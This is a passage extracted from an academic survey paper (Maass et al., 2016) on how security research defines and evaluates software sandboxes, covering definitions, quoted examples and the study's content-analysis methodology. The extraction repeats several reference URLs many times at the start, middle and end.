http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://security.stackexchange.com/questions/16291/are-sandboxes-overrated http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://en.wikipedia.org/w/index.php?title=Sandbox_(computer_security)&oldid=596038515 http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://security.stackexchange.com/questions/5334/what-is-sandboxing http://dx.doi.org/10.7717/peerj-cs.43 We found 101 potential sandboxing papers. Out of these papers, 49 use the term “sandbox” at least once, and 14 provide either an explicit or implicit definition of the term that is clear enough to characterize. The remaining papers that use the term make no attempt at a definition or provide an ambiguous explanation, intertwined with other ideas, and spread over multiple sentences. Within the set of definitions we identify two themes: sandboxing as encapsulation and sandboxing as policy enforcement. Sandboxing as encapsulation has a natural analogy: sandboxes on playgrounds provide a place for children to play with indisputably-defined bounds, making the children easier to watch, and where they are less likely to get hurt or hurt someone else. They also contain the sand, thus preventing it from getting strewn across neighboring surfaces. A similar analogy is used in an answer on the Security StackExchange to the question, “What is a sandbox?” Indeed, Wahbe was working to solve the problem of encapsulating software modules (to keep a fault in a distrusted module from affecting other modules) when he popularized the term in this domain.1 1 While it is clear from at least one publication that the term sandbox was used in computer security earlier than Wahbe’s paper (Neumann, 1990), many early software protection papers cite Wahbe as the origin of the “sandbox” method (Zhong, Edwards & Rees, 1997; Wallach et al., 1997; Schneider, 1997). At least one early commentator felt that this use of the term “sandbox” was merely renaming “trusted computing bases” (TCB) (McLean, 1997). We believe this section makes it clear that sandboxes meet common TCB definitions, but that not all TCBs are sandboxes. Table 1 lists the definitions we found that we characterize as falling within the theme of sandboxing as isolation. Many of these definitions use the term “isolation,” but we prefer the use of encapsulation. In Object Oriented Programming, an object encapsulates related components and selectively restricts access to some of those components. Isolation, on the other hand, sometimes refers to a stronger property in which modules use entirely different resources and therefore cannot interfere with each other at all. Sandboxed components often need to cooperate to be useful. Cooperation and the idea of disjoint resources are present in Wahbe’s original use of the term “sandbox”: Wahbe was trying to reduce the communication overhead present in hardware fault isolation by instead creating software domains that run in the same hardware resources, but that do not interfere when faulty. One potential counterpoint to our use of “encapsulation” is that the term typically is used to refer to cases where the inside (e.g., of an object) is protected from the outside, but sandboxes often protect the external system from the contents of the sandbox. While this is a fair point, this paper does discuss sandboxes that protect their contents from the outside and sandboxes exist that simultaneously defend the inside from the outside and vice versa (Li et al., 2014). Furthermore, one can consider that a sandbox encapsulates an external system that must be protected from a potentially malicious component. Given these points, we maintain that encapsulation’s recognition of cooperation is important enough to use the term over isolation. Nevertheless, we retain the use of isolation when discussing existing definitions. Table 2 presents seven quotes that discuss sandboxing in terms of restrictions or policy enforcement. These definitions reflect different dimensions of the same idea: a security policy can state what is allowed, verboten, or both. The “sandbox” is the subject that enforces the policy or “sandboxing” is the act of enforcing a policy. In short, these quotes cast sandboxing as policy enforcement. Careful inspection of our definition tables shows that the same technique, Sofware- based Fault Isolation (SFI), appears in both tables. Zhang explicitly states that hardening is not used in SFI, but McCamant very clearly refers to operations being “allowed” and the existence of a policy. While it could seem that the sandboxing as isolation and sandboxing as Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 4/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Table 1 Definitions that speak about “sandboxing” in terms of isolation. Reference Quote Zhang et al. (2013) “SFI (Software(-based) Fault Isolation) uses instruction rewriting but provides isolation (sandboxing) rather than hardening, typically allowing jumps anywhere within a sandboxed code region.” Zeng, Tan & Erlingsson (2013) “It is a code-sandboxing technique that isolates untrusted modules from trusted environments. . . . In SFI, checks are inserted before memory-access and control-flow instructions to ensure memory access and control flow stay in a sandbox. A carefully designed interface is the only pathway through which sandboxed modules interact with the rest of the system.” Geneiatakis et al. (2012) “Others works have also focused on shrinking the attack surface of applications by reducing the parts that are exposed to attack, and isolating the most vulnerable parts, using techniques like sandboxing and privilege separation.” De Groef et al. (2012) “Isolation or sandboxing based approaches develop techniques where scripts can be included in web pages without giving them (full) access to the surrounding page and the browser API.” Cappos et al. (2010) “Such sandboxes have gained widespread adoption with web browsers, within which they are used for untrusted code execution, to safely host plug-ins, and to control application behavior on closed platforms such as mobile phones. Despite the fact that program containment is their primary goal, flaws in these sandboxes represent a major risk to computer security.” Reis et al. (2006) “Wagner et al. use system call interposition in Janus to confine untrusted applications to a secure sandbox environment.” Cox et al. (2006) “Our work uses VMs to provide strong sandboxes for Web browser instances, but our contribution is much broader than the containment this provides.” policy enforcement camps are disjoint, we claim they are talking about different dimensions of the same idea. Isolation refers to the what: an isolated environment where a module cannot do harm or be harmed. Policy enforcement refers to the how: by clearly defining what is or is not allowed. To use another childhood analogy, we often sandbox children when we place them in the corner as a punishment. We isolate them by moving them away from everyone else and placing them in a specific, bounded location, then we impose a security policy on them by making statements such as, “Do not speak, look straight ahead, and think about what you did.” We resolve ambiguity in the use of the term “sandbox” by combining these themes: Sandbox An encapsulation mechanism that is used to impose a security policy on software components. This definition concisely and consistently describes the research sandboxes we identify in the remainder of this paper. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 5/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Table 2 Definitions that speak about “sandboxing” in terms of policy enforcement. Reference Quote Xu, Saı̈di & Anderson (2012) “We automatically repackage arbitrary applications to attach user-level sandboxing and policy enforcement code, which closely watches the applications behavior for security and privacy violations such as attempts to retrieve a users sensitive information, send SMS covertly to premium numbers, or access malicious IP addresses.” Chandra et al. (2011) “The re-executed browser runs in a sandbox, and only has access to the client’s HTTP cookie, ensuring that it gets no additional privileges despite running on the server.” Politz et al. (2011) “ADsafe, like all Web sandboxes, consists of two inter-dependent components: (1) a static verifier, called JSLint, which filters out widgets not in a safe subset of JavaScript, and (2) a runtime library, adsafe.js, which implements DOM wrappers and other runtime checks.” Tang, Mai & King (2010) “Fundamentally, rule-based OS sandboxing is about restricting unused or overly permissive interfaces exposed by today’s operating systems.” Sun et al. (2008) “Sandboxing is a commonly deployed proactive defense against untrusted (and hence potentially malicious) software. It restricts the set of resources (such as files) that can be written by an untrusted process, and also limits communication with other processes on the system.” McCamant & Morrisett (2006) “Executing untrusted code while preserving security requires that the code be prevented from modifying memory or executing instructions except as explicitly allowed. Software-based fault isolation (SFI) or “sandboxing” enforces such a policy by rewriting the untrusted code at the instruction level.” Provos (2003) “For an application executing in the sandbox, the system call gateway requests a policy decision from Systrace for every system call.” METHODOLOGY In this section, we discuss the steps we took in order to select and analyze sandboxing papers and the sandboxes they describe. Our methodology is primarily based on the book “Qualitative Content Analysis in Practice” (QCA) (Schreier, 2012). Barnes (2013) provides a succinct summary of the methodology in Section 5.3 of his dissertation. This methodology originates in the social sciences (Berelson, 1952; Krippendorff, 2013; Denzin & Lincoln, 2011) and is intended to repeatably interpret qualitative data to answer a set of research questions. Figure 1 summarizes the iterative process we used to define our questions, pick and interpret papers (‘Picking papers’ and ‘Categorizing the dataset’), and develop our results (‘Analyzing the dataset’). QCA goes well beyond a systematic literature review (Budgen & Brereton, 2006; Kitchenham et al., 2009). While both QCA and systematic reviews require the definition of research questions and repeatable processes for collecting source material, reviews stop short of detailed analysis. QCA carries on where reviews end. When performing QCA, researchers define coding frames to clearly and repeatably establish how the source material will be interpreted to answer the research questions. The frames contain Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 6/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 Figure 1 The iterative process used to define research questions, build a dataset, and interpret the set to answer the questions. This process is inspired by QCA (Schreier, 2012). codes that summarize blocks of data and definitions for each code. Furthermore, QCA methodologies dictate how the coding frames are to be applied, by segmenting the entirety of the data such that each segment can labeled with at most one code. This ensures that the data is coded without missing relevant data and while reducing the researcher’s bias towards some bits of data. Finally, QCA requires researchers to test their full process before carrying out the analysis.2 Together, these steps allow researchers to reliably and effectively 2 We followed the QCA methodology specified by Schreier with one major deviation. We did not segment the text because the vast majority of the content in the papers is irrelevant to our needs. Most uses of QCA attempt to capture content of a text in its entirety. This was not our goal so we analyzed text more selectively. interpret text to answer research questions that are not possible to answer using a purely quantitative analysis. For example, Schreier points out that a quantitative analysis can determine how many women appear in magazine advertisements relative to men, but a qualitative analysis (e.g., QCA) is required to determine whether or not women are more likely to be placed within trivial contexts than men in those ads (Schreier, 2012, p. 2). Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 7/36 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.43 The sandboxes we describe in this paper were selected from the proceedings of five conferences: IEEE Symposium on Security and Privacy (Oakland), Usenix Security, ACM Conference on Computer and Communications Security (CCS), ACM Symposium on Operating System Principles (SOSP), and Usenix Symposium on Operating System Design and Implementation (OSDI). We restricted our selection to particular conferences to improve reproducibility—because of this choice, the set of papers evaluated against our inclusion criteria is very well defined. To select these conferences, we collected all of the sandboxing papers we were aware of and the selected five venues contained far more sandboxing papers than any other venue.3 3 Based on earlier criticism of this paper, we reevaluated our data set by looking at the past four years of proceedings at unselected venues such as the USENIX Annual Technical Conference (ATC), Programming Language Design and Implementation (PLDI), and Object-Oriented Programming, Systems, Languages and Applications (OOPSLA). These venues contained fewer sandboxing papers than our selected venues, and those that appeared were not significantly different in form or content from those in selected venues. In fact, with rare exceptions, the sandboxing papers at the unselected venues were written by the same authors as one or more paper in our data set. The selected conferences are widely regarded as the top-tier conferences in software security and operating systems (http://www.core.edu.au/index.php/conference-rankings, https://personal.cis.strath.ac.uk/changyu.dong/ranking.html, http://faculty.cs.tamu.edu/ guofei/sec conf stat.htm, http://webdocs.cs.ualberta.ca/∼zaiane/htmldocs/ConfRanking. html). Therefore, our data reflects the consensus of large communities. Table 3 presents our twelve research questions, the areas each question attempts to illuminate, and a comprehensive list of their answers as manifested by our paper corpus. We derived an initial set of questions by considering which broad aspects of sandboxes are poorly understood and where better understanding may change how the community performs research in this space. As a result, the questions are necessarily biased by our own backgrounds and personal experiences. In particular, this led to an emphasis on questions about how mechanisms and policies are derived, applied, and evaluated. We added questions while we performed the analysis when we found that we had the data to answer new and interesting questions. Overall, these questions aim to capture a comprehensive snapshot of the current state of sandboxing research, with an emphasis on where sandboxes fit into the process of securing software systems, what policies are enforced and how they are defined and constructed, and what claims are made about sandboxes and how those claims are validated. Picking papers We selected papers from 10 years worth of proceedings at the five conferences mentioned above. We decided whether a paper was included in our sample based on rigorous inclusion criteria so the process of including/excluding papers is repeatable. The most important criterion is that the paper describes a sandbox that meets the definition given in ‘What is a Sandbox?’. The remaining criteria were added as we carried out the study to exclude papers that are incapable of answering the research questions and to clarify relevant nuances in the definition. Papers were included if they met the following criteria: • The paper documents the design of a novel tool or technique that falls under the sandbox definition • The paper is a full conference paper • The paper is about an instance of a sandbox (e.g., not a component for building new sandbox tools, theoretical constructs for sandboxes, etc.) Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 8/36 https://peerj.com/computer-science/ http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html 